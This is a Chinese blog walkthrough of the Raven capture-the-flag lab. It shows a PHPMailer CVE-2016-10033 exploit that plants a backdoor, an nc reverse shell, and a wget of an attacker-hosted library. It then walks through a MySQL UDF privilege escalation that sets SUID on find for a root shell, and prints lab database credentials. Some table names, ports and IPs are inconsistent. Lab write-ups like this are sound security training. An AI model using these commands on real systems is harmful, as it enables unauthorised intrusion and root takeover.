Raven靶场

于 2024-10-11 08:54:17 发布
阅读量532 收藏 14
点赞数 22
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62484818/article/details/142844097
版权

一.信息收集

老方法netdiscover发现主机

nmap进行扫描端口

发现开放22,80,111,52263四个端口

发现vendor路径

打开PATH文件

获得第一个key:

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

发现用了PHPMailer

在version文件发现版本为5.2.16

二.漏洞利用

谷歌搜索:PHPMailer 5.2.16 exp

发现CVE-2016-10033

searchsploit 40974

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /home/kali

需要对40974.py进行修改:

41行:改下地址:http://192.168.100.143/contact.php

42行:后门名称:/hack.php

44行:改下回弹的IP和端口 192.168.100.143 4444

47行:改下写入shell的目录:/var/www/html/hack.php

执行exp

python3 40974.py

如果环境报错按照环境安装:

需要安装requests_toolbelt模块,使用命令:pip install requests-toolbelt安装即可,如果没用pip,需要sudo apt-get install python-pip安装即可。

访问http://192.168.100.143/contact.php,此时就会生成后门文件hack.php

本地开启监听:nc -nlvp 4444

访问:http://192.168.100.143/hack.php

获得反弹shell!

python -c 'import pty;pty.spawn("/bin/bash")'

find / -name flag*

/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

/var/www/flag2.txt

发现两个flag!读取:

cat /var/www/flag2.txt

flag2{6a8ed560f0b5358ecf844108048eb337}

访问http://10.211.55.10/wordpress/wp-content/uploads/2018/11/flag3.png

获得flag3

在flag3目录下发现了wordpress目录,然后进行枚举

grep "password" -rn wp-config.php

显示28行有mysql密码

/** The name of the database for WordPress */

define('DB_NAME', 'wordpress');

/** MySQL database username */

define('DB_USER', 'root');

/** MySQL database password */

define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */

define('DB_HOST', 'localhost');

ps aux | grep root ---查看mysql进程信息

ps aux | grep mysql

dpkg -l | grep mysql --查看历史安装包版本

5.5.6

mysql是root权限运行的,那么接下来就找mysql提权的方法

三.提权

mysql中UDF提权、MOF提权是非常经典的提权方法,我们这里使用UDF提权

我们这里使用searchsploit mysql UDF命令使用1518.c

我们将他考出来

cp /usr/share/exploitdb/exploits/linux/local/1518.c /root

将.c文件编译为.so文件

gcc -g -c 1518.c

gcc -g -shared -o dayu.so 1518.o -lc

-g 生成调试信息

-c 编译(二进制)

-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。

-o:执行命令后的文件名

-lc:-l 库 c库名

在kali上相应目录起一个pythonhttp服务

python3 -m http.server 8000

在目标服务器上中tmp目录下进行wget http://192.168.100.130:8080/hack.so

再次链接mysql数据库

mysql -uroot -pR@v3nSecurity

show databases;--查看mysql数据库中的库

use mysql --进入mysql库

select database(); --查看当前使用的数据库

创建一个叫hack的数据表:

create table hack(line blob);

这条命令创建了一个名为"bug"的数据库表,它只有一个名为"line"的列,类型为二进制(BLOB)。

插入数据文件:

insert into hack values(load_file('/tmp/hack.so'));

这条命令将指定路径(/tmp/hack.so)下的文件内容以二进制形式插入到"hack"表的"line"列中。

这里假设该文件是一个共享库文件。

hack表成功插入二进制数据,然后利用dumpfile函数把文件导出,outfile 多行导出,dumpfile一行导出

outfile会有特殊的转换,而dumpfile是原数据导出!

新建存储函数:

select * from hack into dumpfile '/usr/lib/mysql/plugin/hack.so';

这条命令从"bug"表中选择所有行,并将其以文件的形式导出到指定路径(/usr/lib/mysql/plugin/bug.so)

创建自定义函数do_system,类型是integer,别名(soname)文件名字,然后查询函数是否创建成功:

create function do_system returns integer soname 'hack.so';

这条命令创建了一个名为"do_system"的用户定义函数(UDF),它的返回类型是整数。

查看以下创建的函数:

select * from mysql.func;

调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令:

select do_system('chmod u+s /usr/bin/find');

这条命令调用了之前创建的"do_system"函数,并将"chmod u+s /usr/bin/find"作为参数传递给它。

这里的目的是在执行该命令时提升"/usr/bin/find"命令的权限。

执行find命令

使用find执行 shell

touch hack

find hack -exec "/bin/sh" \;或者find hack -exec "id" \;

cd /root

cat flag4.txt

得到flag4{df2bc5e951d91581467bb9a2a8ff4425}

四.学习总结

1.linux命令提升

(1)grep命令

grep命令来自英文词组global search regular expression and print out the line的缩写,意思是用于全面搜索的正则表达式,并将结果输出。人们通常会将grep命令与正则表达式搭配使用,参数作为搜索过程中的补充或对输出结果的筛选,命令模式十分灵‍活。
语法格式: grep 参数 文件名

常用参数:

参考链接:

https://www.linuxcool.com/grep

(2)dpkg命令

dpkg命令来自英文词组Debian package的缩写,其功能是管理软件安装包,是在Debian系统中最常用的软件安装、管理、卸载的实用工具。
语法格式:dpkg 参数 软件包

常用参数:

参考链接:

https://www.linuxcool.com/dpkg

2.UDF提权手工大体步骤请参考提权,具体步骤总结

mysql -uroot -pR@v3nSecurity

show databases;

use mysql

select database();

create table hack(line blob);

这条命令创建了一个名为"hack"的数据库表,它只有一个名为"line"的列,类型为二进制(BLOB)。

insert into hack values(load_file('/tmp/bug.so'));

这条命令将指定路径(/tmp/hack.so)下的文件内容以二进制形式插入到"bug"表的"line"列中。

这里假设该文件是一个共享库文件。

select * from bug into dumpfile '/usr/lib/mysql/plugin/hack.so';

这条命令从"hack"表中选择所有行,并将其以文件的形式导出到指定路径(/usr/lib/mysql/plugin/hack.so)

这里的目的是将"hack"表中的内容导出为一个共享库文件。

create function do_system returns integer soname 'hack.so';

这条命令创建了一个名为"do_system"的用户定义函数(UDF),它的返回类型是整数。

该函数通过指定的共享库文件(hack.so)进行加载。

select do_system('chmod u+s /usr/bin/find');

这条命令调用了之前创建的"do_system"函数,并将"chmod u+s /usr/bin/find"作为参数传递给它。

这里的目的是在执行该命令时提升"/usr/bin/find"命令的权限。

参考链接:

UDF提权-CSDN博客

椰子树上的苹果
关注
raven-for-redux:用于Redux的Raven中间件
02-05
Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录...
Raven
10-25
"Raven"在此语境下可能是指一种特定的字体或字体库。Raven字体以其独特的风格和设计特点,被广泛应用于各种设计项目,如网页设计、图形设计、出版物以及品牌标识等。 Raven字体可能具有以下特性: 1. **设计风格**...
raven靶场练习
2302_81688883的博客
07-18 538
正常流程要把里面目录都看完查找敏感信息 这里出现了敏感信息泄露,也可以说是未授权访问。http://192.168.214.133/vendor/PATH/ 发现flag。然后在针对扫描出来的端口进行详细扫描,在进行端口分析。然后把所有的目录都打开看一遍,查看有没有相关信息。发现、/verdor/路径可疑,进行搜索。流程,我们是否能在代码仓库中,控制对应的。令的目的,那么我们就要去搜索相应的有没有。这里是网页,那么写入后门的路径地址。如果环境报错按照环境安装:需要安装。在继续进行相关信息收集,在。
vulnhub靶场--Raven靶场
zzzzzzkeai的博客
12-08 401
vulnhub靶场--Raven靶场
raven靶场练习下
2302_81688883的博客
07-19 1817
┌──(root㉿kali)在kali开启监听然后去访问;就可以生成后门maps.php然后我们在去访问这个后门,就反弹连接到kali但是我发现通过反弹无法成功,所以用了另外一种方法因为前面已经发现是PHPMailer。
Vulhub靶场raven
qq_42511731的博客
07-07 636
raven靶场渗透思路
vulnhub靶场Raven1
kukudeshuo的博客
08-08 503
vulnhub靶场Raven1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ 攻击机:kali(192.168.109.128) 靶机:Raven2(192.168.109.152) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标目标靶机 确定目标靶机IP地址为192.168.109.152 使用nmap扫描查看目标靶机端口开放情况
Raven2靶场渗透】
一纸荒芜的博客
08-05 524
Raven2靶场渗透
Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)
weixin_52641450的博客
10-30 871
raven2 靶场 walkthrough by V.K.R
Raven2靶场渗透
b1n的博客
08-29 198
在/var/www/html目录下使用ls查看文件,发现有一个wordpress的文件夹,cd进去寻找信息。访问contact页面时会生成haha.php页面后门,开启侦听,访问mm时会将靶机bash传过来。这里可以看到root是最高权限,所以进行提权,涉及到数据库提权可以使用udf提权方式获取最高权限。再打开readme.md文件,这是一个phpmailer的介绍,在version中查看到版本。访问一下/vendor目录,发现目录有很多的文件。找到flag3的位置,用nc传过来。既然有,话不多说,开干。
靶场练习第二十四天~vulnhub靶场Raven-1
qq_57976347的博客
02-22 1225
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://
raven-django
06-09
免责声明:这项工作正在进行中,目的是让 Django 相关的东西脱离 raven 本身。 暂时不要用这个。 Raven-Django 是一个 Raven 扩展,它为框架提供完整的开箱即用支持。 Raven 本身是的 Python 客户端。 资源 IRC ...
Raven-Engine:用C ++编写的Raven引擎
02-20
《深入解析Raven-Engine:基于C++的游戏开发框架》 Raven-Engine,一个以C++编程语言为核心构建的游戏引擎,为游戏开发者提供了一套高效、灵活且强大的工具集。C++作为底层语言,赋予了Raven-Engine卓越的性能和对...
RAVEN:掠夺
03-15
Raven的渐进矩阵(RPM)的背景下,我们提出了一个新的视觉推理数据集,称为RAVEN(关系和类比视觉重述)。 与以前的作品不同,RAVEN旨在通过将视觉与层次结构表示中的结构,关系和类比推理相关联来提升机器智能。...
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1051
信息安全工程师——机房安全分析与防护篇
【银河麒麟高级服务器操作系统】安全配置基线相关分析全过程及解决方案
银河麒麟操作系统的博客
10-10 701
现象描述:安全基线在银河麒麟高级服务器操作系统V10 sp2和V10 sp3能生效,在V10 sp1-0518系统版本上添加如上内容未生效。系统测试分析情况,可知,在银河麒麟高级服务器操作系统V10系统中,限制实现只有属于wheel组的用户才被允许使用su命令来切换到root用户这个安全基线功能,是需要在/etc/pam.d/su配置文件的pam_wheel.so模块后面,通过追加use_uid这个模块配置参数实现的。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络篇
最新发布
鸿蒙的技术博客
10-10 312
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
PWN二进制安全修仙秘籍【第二章#二进制文件篇02】ELF文件详解
weixin_53801131的博客
10-07 731
形成一个进程镜像,每个进程都拥有独立的虚拟地址空间,这个空间如何布局是由记录在段头表中的程序头决定的。ELF文件头的e_phoff域给出了段头表的位置下面将展示一个可执行文件的程序头👇。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值